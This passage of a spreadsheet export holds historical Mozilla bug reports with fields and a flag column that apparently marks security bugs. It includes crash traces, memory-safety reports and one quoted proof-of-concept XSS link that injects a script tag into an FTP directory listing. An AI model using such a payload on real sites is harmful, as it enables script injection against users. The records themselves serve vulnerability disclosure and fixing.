nsTreeBodyFreame::RowCountChanged() &lt;- the user
NS_NewBoxFrame() &lt;- allocator
So I am choosing the component accordingly, but maybe I am wrong.
```
208:45.77 TEST_START: comm/mail/test/browser/folder-display/browser_deletionFromVirtualFolders.js
208:45.77 GECKO(95056) Chrome file doesn't exist: /NEW-SSD/ASAN-OBJ-DIR/objdir-tb3/_tests/testing/mochitest/browser/comm/mail/test/browser/folder-display/head.js
208:45.78 INFO Entering test bound setupModule
...
209:27.67 INFO Entering test bound test_delete_last_message_from_virtual_folder_closes_message_displays
...
209:27.78 GECKO(95056) ==95056==ERROR: AddressSanitizer: use-after-poison on address 0x62500006376c at pc 0x7f527a848909 bp 0x7ffcb55a9f90 sp 0x7ffcb55a9f88
209:27.78 GECKO(95056) READ of size 4 at 0x62500006376c thread T0
209:28.58 GECKO(95056) error: address range table at offset 0xd50 has an invalid tuple (length = 0) at offset 0xd60
209:28.96 GECKO(95056)	   #0 0x7f527a848908 in nsTreeBodyFrame::RowCountChanged(int, int) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/layout/xul/tree/nsTreeBodyFrame.cpp:1606:7
209:28.97 GECKO(95056)	   #1 0x7f526c12a0ab in nsMsgDBView::NoteChange(unsigned int, int, int) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgDBView.cpp:5951:16
209:28.97 GECKO(95056)	   #2 0x7f526c0fdfa4 in nsMsgDBView::RemoveByIndex(unsigned int) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgDBView.cpp:3001:5
209:28.97 GECKO(95056)	   #3 0x7f526c29c082 in nsMsgThreadedDBView::RemoveByIndex(unsigned int) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgThreadedDBView.cpp:869:25
209:28.97 GECKO(95056)	   #4 0x7f526c128fd0 in nsMsgDBView::OnHdrDeleted(nsIMsgDBHdr*, unsigned int, int, nsIDBChangeListener*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgDBView.cpp:5844:5
209:28.98 GECKO(95056)	   #5 0x7f526c17f91b in nsMsgGroupView::OnHdrDeleted(nsIMsgDBHdr*, unsigned int, int, nsIDBChangeListener*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgGroupView.cpp:636:25
209:28.98 GECKO(95056)	   #6 0x7f526c25eb47 in nsMsgQuickSearchDBView::OnHdrDeleted(nsIMsgDBHdr*, unsigned int, int, nsIDBChangeListener*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgQuickSearchDBView.cpp:798:31
209:28.99 GECKO(95056)	   #7 0x7f526c5508e4 in nsMsgDatabase::NotifyHdrDeletedAll(nsIMsgDBHdr*, unsigned int, int, nsIDBChangeListener*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/db/msgdb/src/nsMsgDatabase.cpp:817:3
209:28.99 GECKO(95056)	   #8 0x7f526c55f2bd in nsMsgDatabase::DeleteHeader(nsIMsgDBHdr*, nsIDBChangeListener*, bool, bool) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/db/msgdb/src/nsMsgDatabase.cpp:1844:5
209:28.99 GECKO(95056)	   #9 0x7f526c9f1925 in nsMsgLocalMailFolder::DeleteMessages(nsIArray*, nsIMsgWindow*, bool, bool, nsIMsgCopyServiceListener*, bool) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/local/src/nsLocalMailFolder.cpp:1063:25
209:29.00 GECKO(95056)	   #10 0x7f526ca1616d in nsMsgLocalMailFolder::EndMove(bool) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/local/src/nsLocalMailFolder.cpp:2699:21
209:29.00 GECKO(95056)	   #11 0x7f526bf58669 in nsCopyMessageStreamListener::EndCopy(nsISupports*, nsresult) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsCopyMessageStreamListener.cpp:135:39
209:29.00 GECKO(95056)	   #12 0x7f526bf5928d in nsCopyMessageStreamListener::OnStopRequest(nsIRequest*, nsresult) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsCopyMessageStreamListener.cpp:155:10
209:29.00 GECKO(95056)	   #13 0x7f526c22dcad in nsMsgProtocol::OnStopRequest(nsIRequest*, nsresult) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/base/src/nsMsgProtocol.cpp:387:29
209:29.00 GECKO(95056)	   #14 0x7f526ca4b636 in nsMailboxProtocol::OnStopRequest(nsIRequest*, nsresult) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/comm/mailnews/local/src/nsMailboxProtocol.cpp:400:18
209:29.02 GECKO(95056)	   #15 0x7f526d73210d in nsInputStreamPump::OnStateStop() /NEW-SSD/NREF-COMM-CENTRAL/mozilla/netwerk/base/nsInputStreamPump.cpp:649:16
209:29.02 GECKO(95056)	   #16 0x7f526d72fec5 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/netwerk/base/nsInputStreamPump.cpp:397:21
209:29.02 GECKO(95056)	   #17 0x7f526d732bfc in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/netwerk/base/nsInputStreamPump.cpp
209:29.03 GECKO(95056)	   #18 0x7f526d1a04d8 in mozilla::SlicedInputStream::OnInputStreamReady(nsIAsyncInputStream*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/io/SlicedInputStream.cpp:416:22
209:29.04 GECKO(95056)	   #19 0x7f526d21c23d in nsInputStreamReadyEvent::Run() /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/io/nsStreamUtils.cpp:94:20
209:29.05 GECKO(95056)	   #20 0x7f526d2da356 in mozilla::RunnableTask::Run() /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/TaskController.cpp:450:16
209:29.05 GECKO(95056)	   #21 0x7f526d2cb29f in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/TaskController.cpp:720:26
209:29.05 GECKO(95056)	   #22 0x7f526d2c84ab in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/TaskController.cpp:579:15
209:29.05 GECKO(95056)	   #23 0x7f526d2c8afd in mozilla::TaskController::ProcessPendingMTTask(bool) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/TaskController.cpp:373:36
209:29.05 GECKO(95056)	   #24 0x7f526d2cc9a9 in operator() /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/TaskController.cpp:123:37
209:29.05 GECKO(95056)	   #25 0x7f526d2cc9a9 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run() /NEW-SSD/ASAN-OBJ-DIR/objdir-tb3/dist/include/nsThreadUtils.h:577:5
209:29.08 GECKO(95056)	   #26 0x7f526d30e5ec in nsThread::ProcessNextEvent(bool, bool*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/threads/nsThread.cpp:1197:14
209:29.08 GECKO(95056)	   #27 0x7f526d3904c1 in NS_InvokeByIndex /NEW-SSD/NREF-COMM-CENTRAL/mozilla/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
209:29.10 GECKO(95056)	   #28 0x7f526feae752 in Invoke /NEW-SSD/NREF-COMM-CENTRAL/mozilla/js/xpconnect/src/XPCWrappedNative.cpp:1620:10
209:29.10 GECKO(95056)	   #29 0x7f526feae752 in CallMethodHelper::Call() /NEW-SSD/NREF-COMM-CENTRAL/mozilla/js/xpconnect/src/XPCWrappedNative.cpp:1176:19
209:29.10 GECKO(95056)	   #30 0x7f526fe6f2b3 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/js/xpconnect/src/XPCWrappedNative.cpp:1142:23
209:29.10 GECKO(95056)	   #31 0x7f526fe73043 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /NEW-SSD/NREF-COMM-CENTRAL/mozilla/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:925:10
209:29.10 GECKO(95056)	   #32 0x178b5a98e80e  (&lt;unknown module&gt;)
```
Full log is attached.
Just in case, I am setting security flag.  Please clear it as people see fit.</t>
        </is>
      </c>
      <c r="X1595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" t="n">
        <v>1293347</v>
      </c>
      <c r="B1596" t="inlineStr">
        <is>
          <t>2016-08-08 10:42:31 -0700</t>
        </is>
      </c>
      <c r="C1596" t="inlineStr">
        <is>
          <t>UAF in sctp_iterator_inp_being_freed</t>
        </is>
      </c>
      <c r="D1596" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:11 -0700</t>
        </is>
      </c>
      <c r="E1596" t="n">
        <v>1</v>
      </c>
      <c r="F1596" t="n">
        <v>1</v>
      </c>
      <c r="G1596" t="n">
        <v>3</v>
      </c>
      <c r="H1596" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1596" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1596" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1596" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1596" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q1596" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1596" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1596" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T1596" t="n">
        <v>1</v>
      </c>
      <c r="U1596" t="n">
        <v>0</v>
      </c>
      <c r="V1596" t="n">
        <v>29</v>
      </c>
      <c r="W1596" t="inlineStr">
        <is>
          <t>When running the test case from bug 1291244 on linux ASAN, I observed a UAF crash. At first glance it looks like a threadsafety problem.</t>
        </is>
      </c>
      <c r="X1596" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" t="n">
        <v>290162</v>
      </c>
      <c r="B1597" t="inlineStr">
        <is>
          <t>2005-04-13 06:16:24 -0700</t>
        </is>
      </c>
      <c r="C1597" t="inlineStr">
        <is>
          <t>crash in InstallTrigger.install.call</t>
        </is>
      </c>
      <c r="D1597" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E1597" t="n">
        <v>1</v>
      </c>
      <c r="F1597" t="n">
        <v>1</v>
      </c>
      <c r="G1597" t="n">
        <v>6</v>
      </c>
      <c r="H1597" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1597" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1597" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K1597" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1597" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1597" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1597" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1597" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q1597" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1597" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1597" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T1597" t="n">
        <v>1</v>
      </c>
      <c r="U1597" t="n">
        <v>0</v>
      </c>
      <c r="V1597" t="n">
        <v>39</v>
      </c>
      <c r="W1597" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050408 Firefox/1.0.3
InstallTrigger.install.call(document,"a","a");
crashes in a strange way, jumping to strange places.
crashes at different $eip which shows it may be exploitable.
last crash:
0x08b9e161 in ?? ()
(gdb) x/i $eip
0x8b9e161:      in     $0xaf,%eax
(gdb) 
Reproducible: Always
Steps to Reproduce:
will attach a testacase</t>
        </is>
      </c>
      <c r="X1597" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" t="n">
        <v>1323361</v>
      </c>
      <c r="B1598" t="inlineStr">
        <is>
          <t>2016-12-13 19:03:43 -0800</t>
        </is>
      </c>
      <c r="C1598" t="inlineStr">
        <is>
          <t>Universal links open external apps without prompt</t>
        </is>
      </c>
      <c r="D1598" t="inlineStr">
        <is>
          <t>2016-12-16 14:43:30 -0800</t>
        </is>
      </c>
      <c r="E1598" t="n">
        <v>1</v>
      </c>
      <c r="F1598" t="n">
        <v>1</v>
      </c>
      <c r="G1598" t="n">
        <v>2</v>
      </c>
      <c r="H1598" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1598" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J1598" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1598" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="L1598" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1598" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1598" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1598" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q1598" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1598" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1598" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1598" t="n">
        <v>1</v>
      </c>
      <c r="U1598" t="n">
        <v>0</v>
      </c>
      <c r="V1598" t="n">
        <v>2</v>
      </c>
      <c r="W1598" t="inlineStr">
        <is>
          <t>Universal links are similar to custom schemes in that opening the URL will open an external app, if that app is installed. The difference is that universal links use the http(s) scheme, so AFAICT, there's no way to detect whether a given URL will open an app or stay in the browser. Example, using Focus 2.0 from the App Store:
1) Install the LinkedIn app.
2) Go to google.com, search "linkedin".
3) Tap the very first result.
This launches the LinkedIn app, unprompted. We assumed that Focus 2.0 wasn't able to launch any external apps, but this is incorrect.</t>
        </is>
      </c>
      <c r="X1598" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" t="n">
        <v>712542</v>
      </c>
      <c r="B1599" t="inlineStr">
        <is>
          <t>2011-12-20 21:10:18 -0800</t>
        </is>
      </c>
      <c r="C1599" t="inlineStr">
        <is>
          <t>sync add-on Enabled/Disabled state incorrect</t>
        </is>
      </c>
      <c r="D1599" t="inlineStr">
        <is>
          <t>2018-09-24 14:24:50 -0700</t>
        </is>
      </c>
      <c r="E1599" t="n">
        <v>1</v>
      </c>
      <c r="F1599" t="n">
        <v>1</v>
      </c>
      <c r="G1599" t="n">
        <v>2</v>
      </c>
      <c r="H1599" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1599" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1599" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1599" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1599" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1599" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1599" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1599" t="inlineStr">
        <is>
          <t>[inbound][verified in services]</t>
        </is>
      </c>
      <c r="Q1599" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1599" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1599" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1599" t="n">
        <v>1</v>
      </c>
      <c r="U1599" t="n">
        <v>0</v>
      </c>
      <c r="V1599" t="n">
        <v>25</v>
      </c>
      <c r="W1599" t="inlineStr">
        <is>
          <t>STR:
1. Reset sync, and click "sync now" to upload the my original profile to server. With some add-ons are enabled, some disabled.(and some of them not download from AMO as well, like userchrome.js)
2. Create a new profile, set up sync as replace data with sync server.
3. After it's done, restart, those add-on enabled/disabled state is quite different from the original profile.
The attachment is the sync-log of the new created profile</t>
        </is>
      </c>
      <c r="X1599" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" t="n">
        <v>860274</v>
      </c>
      <c r="B1600" t="inlineStr">
        <is>
          <t>2013-04-10 07:26:20 -0700</t>
        </is>
      </c>
      <c r="C1600" t="inlineStr">
        <is>
          <t>Deploy bouncer redirect in support of 20.0.1 Firefox release</t>
        </is>
      </c>
      <c r="D1600" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E1600" t="n">
        <v>1</v>
      </c>
      <c r="F1600" t="n">
        <v>1</v>
      </c>
      <c r="G1600" t="n">
        <v>6</v>
      </c>
      <c r="H1600" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1600" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1600" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K1600" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1600" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1600" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1600" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1600" t="inlineStr">
        <is>
          <t>[push interrupt]</t>
        </is>
      </c>
      <c r="Q1600" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1600" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1600" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1600" t="n">
        <v>1</v>
      </c>
      <c r="U1600" t="n">
        <v>0</v>
      </c>
      <c r="V1600" t="n">
        <v>7</v>
      </c>
      <c r="W1600" t="inlineStr">
        <is>
          <t>Mozilla is producing a Firefox 20.0.1 for Windows users only. We need to deploy a redirect to Bouncer that supports this new version and redirects users requesting 20.0 to 20.0.1.</t>
        </is>
      </c>
      <c r="X1600" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" t="n">
        <v>154030</v>
      </c>
      <c r="B1601" t="inlineStr">
        <is>
          <t>2002-06-24 17:35:55 -0700</t>
        </is>
      </c>
      <c r="C1601" t="inlineStr">
        <is>
          <t>HTML directory indexer doesn't html-escape url</t>
        </is>
      </c>
      <c r="D1601" t="inlineStr">
        <is>
          <t>2002-09-05 16:25:37 -0700</t>
        </is>
      </c>
      <c r="E1601" t="n">
        <v>1</v>
      </c>
      <c r="F1601" t="n">
        <v>1</v>
      </c>
      <c r="G1601" t="n">
        <v>3</v>
      </c>
      <c r="H1601" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1601" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1601" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1601" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1601" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1601" t="inlineStr">
        <is>
          <t>[FIXED ON TRUNK][FIXED ON BRANCH]</t>
        </is>
      </c>
      <c r="Q1601" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1601" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1601" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T1601" t="n">
        <v>1</v>
      </c>
      <c r="U1601" t="n">
        <v>0</v>
      </c>
      <c r="V1601" t="n">
        <v>10</v>
      </c>
      <c r="W1601" t="inlineStr">
        <is>
          <t>As reported by ptrs-ejy@bp.iij4u.or.jp to the security group, the uri (which is
added to the page) isn't html escaped:
&lt;quote&gt;
+ Exploit code:
~~~~~~~~~~~~~~~~~
&lt;a href="ftp://'FTPserver' or
'FTP+HTTPserver'/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E"&gt;Exploit&lt;/a&gt;
&lt;/quote&gt;
(You need to add a valid ftp server in there)
Patch coming</t>
        </is>
      </c>
      <c r="X1601" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" t="n">
        <v>767402</v>
      </c>
      <c r="B1602" t="inlineStr">
        <is>
          <t>2012-06-22 08:40:20 -0700</t>
        </is>
      </c>
      <c r="C1602" t="inlineStr">
        <is>
          <t>[traceback] TweepError: Unable to get username, invalid oauth token!</t>
        </is>
      </c>
      <c r="D1602" t="inlineStr">
        <is>
          <t>2012-07-11 12:47:41 -0700</t>
        </is>
      </c>
      <c r="E1602" t="n">
        <v>1</v>
      </c>
      <c r="F1602" t="n">
        <v>1</v>
      </c>
      <c r="G1602" t="n">
        <v>5</v>
      </c>
      <c r="H1602" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1602" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1602" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K1602" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1602" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1602" t="inlineStr">
        <is>
          <t>u=contributor c=AoA p=1</t>
        </is>
      </c>
      <c r="Q1602" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1602" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1602" t="inlineStr">
        <is>
          <t>2012.13</t>
        </is>
      </c>
      <c r="T1602" t="n">
        <v>1</v>
      </c>
      <c r="U1602" t="n">
        <v>0</v>
      </c>
      <c r="V1602" t="n">
        <v>3</v>
      </c>
      <c r="W1602" t="inlineStr">
        <is>
          <t>Since we are keeping oauth tokens longer, we are getting invalid/expired/whatever token errors now. When this happens, we should just sign them out of twitter and make them reauth. Otherwise, they keep trying to do things and exceptions keep coming in.
Traceback (most recent call last):
  File "/data/www/support.mozilla.org/kitsune/vendor/src/django/django/core/handlers/base.py", line 111, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "/data/www/support.mozilla.org/kitsune/vendor/src/django/django/views/decorators/http.py", line 45, in inner
    return func(request, *args, **kwargs)
  File "/data/www/support.mozilla.org/kitsune/vendor/src/django-session-csrf/session_csrf/__init__.py", line 127, in wrapper
    response = f(request, *args, **kw)
  File "/data/www/support.mozilla.org/kitsune/apps/twitter/__init__.py", line 43, in wrapper
    return view_func(request, *args, **kwargs)
  File "/data/www/support.mozilla.org/kitsune/apps/customercare/views.py", line 321, in landing
    twitter.authed else None),
  File "/data/www/support.mozilla.org/kitsune/vendor/src/tweepy/tweepy/auth.py", line 161, in get_username
    raise TweepError("Unable to get username, invalid oauth token!")
TweepError: Unable to get username, invalid oauth token!</t>
        </is>
      </c>
      <c r="X1602" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" t="n">
        <v>503226</v>
      </c>
      <c r="B1603" t="inlineStr">
        <is>
          <t>2009-07-08 18:40:49 -0700</t>
        </is>
      </c>
      <c r="C1603" t="inlineStr">
        <is>
          <t>document.getSelection() can read cross-origin content selections</t>
        </is>
      </c>
      <c r="D1603" t="inlineStr">
        <is>
          <t>2009-10-27 19:39:49 -0700</t>
        </is>
      </c>
      <c r="E1603" t="n">
        <v>1</v>
      </c>
      <c r="F1603" t="n">
        <v>1</v>
      </c>
      <c r="G1603" t="n">
        <v>3</v>
      </c>
      <c r="H1603" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1603" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1603" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1603" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1603" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1603" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1603" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1603" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q1603" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1603" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1603" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1603" t="n">
        <v>1</v>
      </c>
      <c r="U1603" t="n">
        <v>0</v>
      </c>
      <c r="V1603" t="n">
        <v>15</v>
      </c>
      <c r="W1603" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1pre) Gecko/20090708 Shiretoko/3.5.1pre
The document.getSelection() method can be used to read cross-origin content selections.
By storing a reference to the contentDocument of an iframe, any selections made within that iframe can be read regardless of origin.
This method appears to be deprecated.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1603" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" t="n">
        <v>1428944</v>
      </c>
      <c r="B1604" t="inlineStr">
        <is>
          <t>2018-01-08 17:53:08 -0800</t>
        </is>
      </c>
      <c r="C1604" t="inlineStr">
        <is>
          <t>Policy: Set or disable first-run (welcome) page</t>
        </is>
      </c>
      <c r="D1604" t="inlineStr">
        <is>
          <t>2018-04-18 01:35:30 -0700</t>
        </is>
      </c>
      <c r="E1604" t="n">
        <v>1</v>
      </c>
      <c r="F1604" t="n">
        <v>1</v>
      </c>
      <c r="G1604" t="n">
        <v>2</v>
      </c>
      <c r="H1604" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1604" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1604" t="inlineStr">
        <is>
          <t>Enterprise Policies</t>
        </is>
      </c>
      <c r="K1604" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1604" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1604" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1604" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1604" t="inlineStr"/>
      <c r="Q1604" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1604" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1604" t="inlineStr">
        <is>
